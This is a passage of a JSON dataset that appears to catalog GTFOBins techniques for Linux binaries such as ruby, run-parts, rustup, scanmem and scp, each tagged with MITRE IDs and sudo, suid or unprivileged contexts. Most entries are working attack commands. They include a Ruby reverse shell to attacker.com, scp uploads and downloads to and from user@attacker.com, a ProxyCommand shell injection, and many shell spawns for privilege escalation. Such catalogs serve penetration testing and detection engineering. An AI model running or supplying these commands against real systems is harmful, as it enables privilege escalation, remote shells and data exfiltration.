context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:reverse-shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:shell:0:capabilities","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:upload:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:upload:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:0:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:0:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:1:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:1:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:0:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:0:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:0:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:1:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:1:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/ --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:1:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:runscript:shell:0:sudo","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/runscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:runscript:shell:0:suid","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/runscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:runscript:shell:0:unprivileged","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/runscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-read:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-read:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-write:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-write:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:inherit:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:inherit:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-read:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-read:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-write:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-write:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustfmt:file-read:0:sudo","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustfmt:file-read:0:unprivileged","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:command:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:command:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:shell:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:shell:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sash:shell:0:sudo","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sash:shell:0:suid","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sash:shell:0:unprivileged","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scanmem:shell:0:sudo","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scanmem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scanmem:shell:0:suid","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scanmem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scanmem:shell:0:unprivileged","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scanmem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:download:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:download:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:download:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:1:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:1:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:1:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:upload:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:upload:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local 